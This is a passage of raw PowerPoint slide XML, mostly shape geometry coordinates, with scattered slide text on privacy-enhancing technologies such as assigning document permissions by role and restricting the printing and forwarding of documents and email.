                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3117216" y="2964938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3076509" y="2989191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3035400" y="3012414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2993906" y="3034610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2952045" y="3055779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2909836" y="3075925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2867296" y="3095049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2824443" y="3113153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2781295" y="3130239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2737870" y="3146309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2694186" y="3161365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2650262" y="3175408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2606114" y="3188441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2561761" y="3200465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517221" y="3211483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2472512" y="3221496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2427652" y="3230506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2382658" y="3238516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2337549" y="3245527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2292343" y="3251541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2247058" y="3256559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2201711" y="3260585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2156320" y="3263620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2110905" y="3265665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2065481" y="3266723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2020069" y="3266795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1974684" y="3265884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1929346" y="3263991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1884072" y="3261119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1838881" y="3257269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1793790" y="3252443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1748817" y="3246643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1703980" y="3239871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1659297" y="3232129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1614787" y="3223419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1570466" y="3213743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1526354" y="3203103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1482468" y="3191500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1438825" y="3178936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1395444" y="3165414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1352344" y="3150936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1309541" y="3135502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1267053" y="3119116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1224900" y="3101780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1183098" y="3083494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1141666" y="3064261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1100622" y="3044083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1059983" y="3022962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1019767" y="3000899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="979994" y="2977898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="940679" y="2953959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="901842" y="2929084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="863501" y="2903276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="825672" y="2876536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788376" y="2848866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751628" y="2820269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715447" y="2790746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679852" y="2760298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="644860" y="2728929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610489" y="2696639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576757" y="2663432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543682" y="2629308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511282" y="2594270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479575" y="2558319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="448579" y="2521458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417755" y="2482961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388030" y="2443923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359402" y="2404361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="331873" y="2364297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="305441" y="2323749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280108" y="2282738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255871" y="2241282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232733" y="2199402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210691" y="2157118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189746" y="2114449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169899" y="2071415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151148" y="2028035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133493" y="1984329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116935" y="1940318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101473" y="1896020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87106" y="1851456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73836" y="1806644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61661" y="1761606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50582" y="1716360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40598" y="1670926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31709" y="1625324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23915" y="1579574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17216" y="1533695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11611" y="1487707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7101" y="1441630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3684" y="1395483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1362" y="1349287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134" y="1303060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1256823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="958" y="1210596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3011" y="1164397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6156" y="1118247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10394" y="1072165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15726" y="1026172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22150" y="980286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29666" y="934528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38274" y="888917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47975" y="843473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58768" y="798215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70652" y="753164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83628" y="708340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97695" y="663760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112854" y="619447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129103" y="575418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146444" y="531695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164875" y="488296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184396" y="445241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205008" y="402550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226710" y="360243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249503" y="318340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273385" y="276859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298356" y="235822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324417" y="195247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351568" y="155154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379807" y="115563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409135" y="76494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439553" y="37966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471058" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525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716262" y="4304538"/>
              <a:ext cx="1069975" cy="802005"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1069975" h="802004">
                  <a:moveTo>
                    <a:pt x="953897" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="115951" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70830" y="10499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33972" y="39131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9116" y="81599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="133603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="668020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9116" y="720024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33972" y="762492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70830" y="791124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115951" y="801624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="953897" y="801624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="999017" y="791124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035875" y="762492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060731" y="720024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069848" y="668020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069848" y="133603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060731" y="81599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035875" y="39131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="999017" y="10499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="953897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716262" y="4304538"/>
              <a:ext cx="1069975" cy="802005"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1069975" h="802004">
                  <a:moveTo>
                    <a:pt x="0" y="133603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9116" y="81599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33972" y="39131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70830" y="10499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115951" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="953897" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="999017" y="10499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035875" y="39131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060731" y="81599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069848" y="133603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069848" y="668020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060731" y="720024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035875" y="762492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="999017" y="791124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="953897" y="801624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115951" y="801624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70830" y="791124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33972" y="762492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9116" y="720024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="668020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="13360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0166350" y="4509896"/>
            <a:ext cx="17081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30" b="1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784845" y="6204458"/>
            <a:ext cx="1097280" cy="827405"/>
            <a:chOff x="7784845" y="6204458"/>
            <a:chExt cx="1097280" cy="827405"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7797545" y="6217158"/>
              <a:ext cx="1071880" cy="802005"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1071879" h="802004">
                  <a:moveTo>
                    <a:pt x="955294" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="116077" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70883" y="10499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33988" y="39131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9118" y="81599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="133604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="668020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9118" y="720024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33988" y="762492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70883" y="791124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116077" y="801624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="955294" y="801624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1000488" y="791124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1037383" y="762492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1062253" y="720024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071372" y="668020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071372" y="133604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1062253" y="81599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1037383" y="39131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1000488" y="10499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="955294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797545" y="6217158"/>
              <a:ext cx="1071880" cy="802005"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1071879" h="802004">
                  <a:moveTo>
                    <a:pt x="0" y="133604"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9118" y="81599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33988" y="39131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70883" y="10499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116077" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="955294" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1000488" y="10499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1037383" y="39131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1062253" y="81599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071372" y="133604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071372" y="668020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1062253" y="720024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1037383" y="762492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1000488" y="791124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="955294" y="801624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116077" y="801624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70883" y="791124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33988" y="762492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9118" y="720024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="668020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="13360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8248650" y="6422897"/>
            <a:ext cx="17081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30" b="1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776214" y="4291838"/>
            <a:ext cx="1097280" cy="827405"/>
            <a:chOff x="5776214" y="4291838"/>
            <a:chExt cx="1097280" cy="827405"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="object 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5788914" y="4304538"/>
              <a:ext cx="1071880" cy="802005"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1071879" h="802004">
                  <a:moveTo>
                    <a:pt x="955293" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="116077" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70883" y="10499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33988" y="39131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9118" y="81599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="133603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="668020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9118" y="720024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33988" y="762492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70883" y="791124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116077" y="801624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="955293" y="801624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1000488" y="791124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1037383" y="762492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1062253" y="720024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071371" y="668020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071371" y="133603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1062253" y="81599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1037383" y="39131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1000488" y="10499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="955293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788914" y="4304538"/>
              <a:ext cx="1071880" cy="802005"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1071879" h="802004">
                  <a:moveTo>
                    <a:pt x="0" y="133603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9118" y="81599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33988" y="39131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70883" y="10499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116077" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="955293" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1000488" y="10499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1037383" y="39131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1062253" y="81599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071371" y="133603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071371" y="668020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1062253" y="720024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1037383" y="762492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1000488" y="791124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="955293" y="801624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116077" y="801624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70883" y="791124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33988" y="762492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9118" y="720024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="668020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="133603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6239383" y="4509896"/>
            <a:ext cx="17081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30" b="1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128266" y="4204589"/>
            <a:ext cx="3331210" cy="79057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Ass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gn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fi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permis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ions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endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="128270">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="370"/>
              </a:spcBef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various</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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document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roles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093577" y="4182516"/>
            <a:ext cx="3121025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50495">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Restrict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on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document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printi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7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fo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wardi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7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19747" y="7327798"/>
            <a:ext cx="3424554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5100" marR="5080" indent="-152400">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Restrict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dirty="0" sz="2200" spc="-14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email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message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printing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3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forwarding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86471" y="3785615"/>
            <a:ext cx="1839468" cy="1837943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3011" y="306451"/>
            <a:ext cx="56495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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Privacy</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enhancing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80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Technologies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19015" y="731519"/>
            <a:ext cx="7740396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847469" y="2266569"/>
            <a:ext cx="12563475" cy="1569085"/>
            <a:chOff x="1847469" y="2266569"/>
            <a:chExt cx="12563475" cy="1569085"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1856994" y="2745486"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="0" y="88773"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="991742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773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869186" y="2276094"/>
              <a:ext cx="5980430" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5980430" h="469900">
                  <a:moveTo>
                    <a:pt x="5901944" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="78231" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5974024" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5957252" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5932384" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5901944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869186" y="2276094"/>
              <a:ext cx="5980430" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
